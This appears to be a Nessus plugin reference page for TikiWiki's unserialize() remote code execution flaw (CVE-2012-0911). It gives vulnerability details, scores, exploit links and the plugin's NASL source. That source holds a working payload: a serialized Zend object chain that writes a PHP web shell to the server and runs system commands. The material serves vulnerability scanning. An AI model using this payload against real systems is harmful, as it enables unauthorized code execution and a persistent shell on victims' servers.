TikiWiki unserialize() Function Arbitrary Code Execution - Nessus
High Plugin ID: 61733This page contains detailed information about the TikiWiki unserialize() Function Arbitrary Code Execution Nessus plugin including available exploits and PoCs found on GitHub, in Metasploit or Exploit-DB for verifying of this vulnerability.
Plugin Overview
ID: 61733
Name: TikiWiki unserialize() Function Arbitrary Code Execution
Filename: tikiwiki_unserialize_code_execution.nasl
Vulnerability Published: 2012-08-04
This Plugin Published: 2012-08-30
Last Modification Time: 2022-04-11
Plugin Version: 1.16
Plugin Type: remote
Plugin Family: CGI abuses
Dependencies:
os_fingerprint.nasl, tikiwiki_detect.nasl
Required KB Items [?]: www/PHP, www/tikiwiki
Excluded KB Items: Settings/disable_cgi_scanning
Vulnerability Information
Severity: High
Vulnerability Published: 2012-08-04
Patch Published: 2012-05-01
CVE [?]: CVE-2012-0911
CPE [?]: cpe:/a:tikiwiki:tikiwiki
Synopsis
The remote web server hosts an application that allows arbitrary code execution.
Description
The version of the TikiWiki installed on the remote host contains a flaw that could allow a remote attacker to execute arbitrary code. The 'unserialize()' function is not properly sanitized before being used in the 'lib/banners/bannerlib.php', 'tiki-print_multi_pages.php', 'tiki-send_objects.php' and 'tiki-print_pages.php' scripts.
Successful exploitation of the vulnerability requires that the 'multiprint' feature is enabled, the PHP setting 'display_errors' must be set to 'On', and a PHP version older than 5.3.4 must be in use to allow poison NULL bytes in filesystem-related functions.
Solution
Upgrade to version 8.4 or later.
Public Exploits
Target Network Port(s): 80
Target Asset(s): Services/www
Exploit Available: True (Metasploit Framework, Exploit-DB, D2 Elliot)
Exploit Ease: No exploit is required
Here's the list of publicly known exploits and PoCs for verifying the TikiWiki unserialize() Function Arbitrary Code Execution vulnerability:
- Metasploit: exploit/unix/webapp/tikiwiki_unserialize_exec
[Tiki Wiki unserialize() PHP Code Execution] - Exploit-DB: exploits/php/webapps/19573.php
[EDB-19573: Tiki Wiki CMS Groupware 8.3 - 'Unserialize()' PHP Code Execution] - Exploit-DB: exploits/php/webapps/19630.rb
[EDB-19630: Tiki Wiki CMS Groupware 8.3 - 'Unserialize()' PHP Code Execution (Metasploit)] - D2 Elliot: tiki_wiki_cms_groupware_8.3_rce.html
[Tiki Wiki CMS Groupware 8.3 RCE]
Before running any exploit against any system, make sure you are authorized by the owner of the target system(s) to perform such activity. In any other case, this would be considered as an illegal activity.
WARNING: Beware of using unverified exploits from sources such as GitHub or Exploit-DB. These exploits and PoCs could contain malware. For more information, see how to use exploits safely.
Risk Information
CVSS V2 Vector [?]: AV:N/AC:L/Au:N/C:P/I:P/A:P/E:F/RL:OF/RC:C
| CVSS Base Score: | 7.5 (High) |
| Impact Subscore: | 6.4 |
| Exploitability Subscore: | 10.0 |
| CVSS Temporal Score: | 6.2 (Medium) |
| CVSS Environmental Score: | NA (None) |
| Modified Impact Subscore: | NA |
| Overall CVSS Score: | 6.2 (Medium) |
| CVSS Base Score: | 8.8 (High) |
| Impact Subscore: | 5.9 |
| Exploitability Subscore: | 2.8 |
| CVSS Temporal Score: | 8.2 (High) |
| CVSS Environmental Score: | NA (None) |
| Modified Impact Subscore: | NA |
| Overall CVSS Score: | 8.2 (High) |
Go back to menu.
Plugin Source
This is the tikiwiki_unserialize_code_execution.nasl nessus plugin source code. This script is Copyright (C) 2012-2022 and is owned by Tenable, Inc. or an Affiliate thereof.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(61733);
script_version("1.16");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");
script_cve_id("CVE-2012-0911");
script_bugtraq_id(54298);
script_xref(name:"EDB-ID", value:"19573");
script_name(english:"TikiWiki unserialize() Function Arbitrary Code Execution");
script_set_attribute(attribute:"synopsis", value:
"The remote web server hosts an application that allows arbitrary code
execution.");
script_set_attribute(attribute:"description", value:
"The version of the TikiWiki installed on the remote host contains a
flaw that could allow a remote attacker to execute arbitrary code. The
'unserialize()' function is not properly sanitized before being used in
the 'lib/banners/bannerlib.php', 'tiki-print_multi_pages.php',
'tiki-send_objects.php' and 'tiki-print_pages.php' scripts.
Successful exploitation of the vulnerability requires that the
'multiprint' feature is enabled, the PHP setting 'display_errors' must
be set to 'On', and a PHP version older than 5.3.4 must be in use to
allow poison NULL bytes in filesystem-related functions.");
script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2012/Jul/19");
script_set_attribute(attribute:"see_also", value:"https://tiki.org/article191-Tiki-Releases-8-4");
script_set_attribute(attribute:"solution", value:
"Upgrade to version 8.4 or later.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"d2_elliot_name", value:"Tiki Wiki CMS Groupware 8.3 RCE");
script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'Tiki Wiki unserialize() PHP Code Execution');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"2012/08/04");
script_set_attribute(attribute:"patch_publication_date", value:"2012/05/01");
script_set_attribute(attribute:"plugin_publication_date", value:"2012/08/30");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:tikiwiki:tikiwiki");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_end_attributes();
script_category(ACT_DESTRUCTIVE_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2012-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("tikiwiki_detect.nasl", "os_fingerprint.nasl");
script_require_keys("www/tikiwiki", "www/PHP");
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_ports("Services/www", 80);
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");
include("url_func.inc");
include("data_protection.inc");
port = get_http_port(default:80, php:TRUE);
install = get_install_from_kb(
appname : "tikiwiki",
port : port,
exit_on_fail : TRUE
);
dir = install["dir"];
install_url = build_url(qs:dir+'/', port:port);
# Get full path for use in our exploit POST request
url = dir + '/tiki-rss_error.php';
res = http_send_recv3(method:"GET", item:url, port:port, exit_on_fail:TRUE);
get_path = eregmatch(pattern:"[> ](([a-zA-Z]:\\|\/).*)tiki-rss_error\.php", string:res[2], icase:TRUE);
if (isnull(get_path)) exit(0, "The full path for the TikiWiki install at "+install_url+" could not be determined.");
install_path = get_path[1];
# Determine which command to execute on target host
os = get_kb_item("Host/OS");
if (os && report_paranoia < 2)
{
if ("Windows" >< os) cmd = 'ipconfig /all';
else cmd = 'id';
cmds = make_list(cmd);
}
else cmds = make_list('id', 'ipconfig /all');
cmd_pats = make_array();
cmd_pats['id'] = "uid=[0-9]+.*gid=[0-9]+.*";
cmd_pats['ipconfig /all'] = "Subnet Mask";
token = (SCRIPT_NAME - ".nasl") + "-" + unixtime() + ".php";
foreach cmd (cmds)
{
# Get path to the file uploaded for use in our reporting section
if (cmd == 'id') upload_path = "system('pwd')";
else upload_path = "system('dir "+ token +"')";
# Form our PHP file to upload
php_shell = "<?php+echo('<pre>');+system('"+ cmd +"');+echo(' - "+token+" ');+"+upload_path+";?>";
shell_length = strlen(php_shell);
path = install_path + token + "%00";
path_length = strlen(path) - 2;
printpages = 'O:29:\"Zend_Pdf_ElementFactory_Proxy\":1:' +
'{s:39:\"%00Zend_Pdf_ElementFactory_Proxy%00_factory\";O:51:\"Zend_Search_Lucene_Index_SegmentWriter_StreamWriter\":5:' +
'{s:12:\"%00*%00_docCount\";i:1;s:8:\"%00*%00_name\";s:3:\"foo\";s:13:\"%00*%00_directory\";O:47:\"Zend_Search_Lucene_Storage_Directory_Filesystem\":1:' +
'{s:11:\"%00*%00_dirPath\";s:' + path_length +':"'+path+'";}' +
's:10:\"%00*%00_fields\";a:1:' +
'{i:0;O:34:\"Zend_Search_Lucene_Index_FieldInfo\":1:' +
'{s:4:\"name\";s:'+shell_length+':"'+php_shell+'";}}' +
's:9:\"%00*%00_files\";O:8:\"stdClass\":0:{}}}';
printpages = urlencode(
str : printpages,
unreserved : "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_.!~'-+$",
case_type : HEX_UPPERCASE
);
# Send POST request to upload the PHP file
res2 = http_send_recv3(
port : port,
method : "POST",
item : dir + '/tiki-print_multi_pages.php',
data : 'printpages=' + printpages,
add_headers : make_array("Content-Type","application/x-www-form-urlencoded"),
exit_on_fail : TRUE
);
if ('Required features: <b>feature_wiki_multiprint</b>' >< res2[2])
exit(0, "The Multiprint feature appears to be disabled for the TikiWiki install at "+install_url+".");
exp_request = http_last_sent_request();
# Try accessing the file we uploaded
url3 = dir + "/" + token;
res3 = http_send_recv3(method:"GET", item:url3, port:port, exit_on_fail:TRUE);
if (egrep(pattern:cmd_pats[cmd], string:res3[2]))
{
# Remove NULL byte and format the output
if (cmd == 'id')
{
out_full = strstr(res3[2], "uid");
pos = stridx(out_full, " - " + token);
output = substr(out_full, 0, pos);
form_up_path = strstr(res3[2], "php");
form_up_path2 = stridx(form_up_path, '\n');
form_up_path3 = substr(form_up_path, 0, form_up_path2) - "php ";
get_up_path = chomp(form_up_path3) + "/" + token;
}
else
{
out_full = strstr(res3[2], "Windows IP Configuration");
pos = stridx(out_full, " - " + token);
output = substr(out_full, 0, pos);
form_up_path = strstr(res3[2],"Directory of");
form_up_path2 = stridx(form_up_path, '\n');
form_up_path3 = substr(form_up_path, 0, form_up_path2) - "Directory of ";
get_up_path = chomp(form_up_path3) + "\" + token;
}
if (report_verbosity > 0)
{
snip = crap(data:"-", length:30)+' snip '+ crap(data:"-", length:30);
report =
'\nNessus was able to verify the issue exists using the following request :' +
'\n' +
'\n' + build_url(qs:url3, port:port) +
'\n' +
'\nNote: This file has not been removed by Nessus and will need to be' +
'\nmanually deleted (' + get_up_path + ').' +
'\n';
if (report_verbosity > 1)
{
report +=
'\nThis file was uploaded using the following request :' +
'\n' +
'\n' + snip +
'\n' + exp_request +
'\n' + snip +
'\n' +
'\n' + 'The file uploaded by Nessus executed the command : '+ cmd +
'\nwhich produced the following output :' +
'\n' +
'\n' + snip +
'\n' + data_protection::sanitize_uid(output:chomp(output)) +
'\n' + snip +
'\n';
}
security_hole(port:port, extra:report);
}
else security_hole(port);
exit(0);
}
}
audit(AUDIT_WEB_APP_NOT_AFFECTED, "TikiWiki", install_url);
The latest version of this script can be found in these locations depending on your platform:
- Linux / Unix:
/opt/nessus/lib/nessus/plugins/tikiwiki_unserialize_code_execution.nasl - Windows:
C:\ProgramData\Tenable\Nessus\nessus\plugins\tikiwiki_unserialize_code_execution.nasl - Mac OS X:
/Library/Nessus/run/lib/nessus/plugins/tikiwiki_unserialize_code_execution.nasl
Go back to menu.
How to Run
Here is how to run the TikiWiki unserialize() Function Arbitrary Code Execution as a standalone plugin via the Nessus web user interface (https://localhost:8834/):
- Click to start a New Scan.
- Select Advanced Scan.
- Navigate to the Plugins tab.
- On the top right corner click to Disable All plugins.
- On the left side table select CGI abuses plugin family.
- On the right side table select TikiWiki unserialize() Function Arbitrary Code Execution plugin ID 61733.
- Specify the target on the Settings tab and click to Save the scan.
- Run the scan.
Here are a few examples of how to run the plugin in the command line. Note that the examples below demonstrate the usage on the Linux / Unix platform.
Basic usage:
/opt/nessus/bin/nasl tikiwiki_unserialize_code_execution.nasl -t <IP/HOST>Run the plugin with audit trail message on the console:
/opt/nessus/bin/nasl -a tikiwiki_unserialize_code_execution.nasl -t <IP/HOST>Run the plugin with trace script execution written to the console (useful for debugging):
/opt/nessus/bin/nasl -T - tikiwiki_unserialize_code_execution.nasl -t <IP/HOST>Run the plugin with using a state file for the target and updating it (useful for running multiple plugins on the target):
/opt/nessus/bin/nasl -K /tmp/state tikiwiki_unserialize_code_execution.nasl -t <IP/HOST>Go back to menu.
References
BID | SecurityFocus Bugtraq ID: See also:
- https://www.tenable.com/plugins/nessus/61733
- https://seclists.org/bugtraq/2012/Jul/19
- https://tiki.org/article191-Tiki-Releases-8-4
- https://vulners.com/nessus/TIKIWIKI_UNSERIALIZE_CODE_EXECUTION.NASL
- 46737 - TikiWiki tiki-lastchanges.php Empty sort_mode Parameter Information Disclosure
- 26968 - TikiWiki tiki-graph_formula.php f Parameter Arbitrary Command Execution
- 22303 - TikiWiki jhot.php Arbitrary File Upload
- 14364 - TikiWiki < 1.8.2 Multiple Input Validation Vulnerabilities
- 49706 - TikiWiki 'tiki-edit_wiki_section.php' type Parameter XSS
- 22490 - FreeBSD : tikiwiki -- multiple vulnerabilities (e4c62abd-5065-11db-a5ae-00508d6a62df)
- 18647 - GLSA-200507-06 : TikiWiki: Arbitrary command execution through XML-RPC
- 22460 - GLSA-200609-16 : Tikiwiki: Arbitrary command execution
- 27553 - GLSA-200710-21 : TikiWiki: Arbitrary command execution
- 28219 - GLSA-200711-19 : TikiWiki: Multiple vulnerabilities
Version
This page has been produced using Nessus Professional 10.1.2 (#68) LINUX, Plugin set 202205072148.
Plugin file tikiwiki_unserialize_code_execution.nasl version 1.16. For more plugins, visit the Nessus Plugin Library.
Go back to menu.
